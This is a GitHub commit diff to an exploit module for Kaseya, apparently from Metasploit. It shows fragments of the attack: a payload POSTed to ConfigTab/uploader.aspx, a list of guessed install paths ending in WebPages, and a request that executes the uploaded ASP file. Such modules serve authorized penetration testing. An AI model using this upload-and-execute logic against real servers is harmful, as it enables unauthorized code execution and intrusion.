Skip to content

Commit a88a6c5

Browse files
committed
Add WebPges to the paths
1 parent f9a9a45 commit a88a6c5

File tree

1 file changed

+12
-12
lines changed

1 file changed

+12
-12
lines changed

modules/exploits/windows/http/kaseya_uploader.rb

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -60,13 +60,13 @@ def check
6060

6161

6262
def upload_file(payload, path, filename, session_id)
63-
print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...")
63+
print_status("#{peer} - Uploading payload to #{path}...")
6464

6565
res = send_request_cgi({
6666
'method' => 'POST',
6767
'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
6868
'vars_get' => {
69-
'PathData' => path + 'WebPages' + '\\',
69+
'PathData' => path,
7070
'qqfile' => filename
7171
},
7272
'data' => payload,
@@ -100,20 +100,20 @@ def exploit
100100

101101
paths = [
102102
# We have to guess the path, so just try the most common directories
103-
'C:\\Kaseya\\',
104-
'C:\\Program Files\\Kaseya\\',
105-
'C:\\Program Files (x86)\\Kaseya\\',
106-
'D:\\Kaseya\\',
107-
'D:\\Program Files\\Kaseya\\',
108-
'D:\\Program Files (x86)\\Kaseya\\',
109-
'E:\\Kaseya\\',
110-
'E:\\Program Files\\Kaseya\\',
111-
'E:\\Program Files (x86)\\Kaseya\\',
103+
'C:\\Kaseya\\WebPages\\',
104+
'C:\\Program Files\\Kaseya\\WebPages\\',
105+
'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
106+
'D:\\Kaseya\\WebPages\\',
107+
'D:\\Program Files\\Kaseya\\WebPages\\',
108+
'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
109+
'E:\\Kaseya\\WebPages\\',
110+
'E:\\Program Files\\Kaseya\\WebPages\\',
111+
'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
112112
]
113113

114114
paths.each do |path|
115115
if upload_file(payload, path, asp_name, session_id)
116-
register_files_for_cleanup(path + "WebPages\\" + asp_name)
116+
register_files_for_cleanup(path + asp_name)
117117
print_status("#{peer} - Executing payload #{asp_name}")
118118

119119
send_request_cgi({

0 commit comments

Comments
 (0)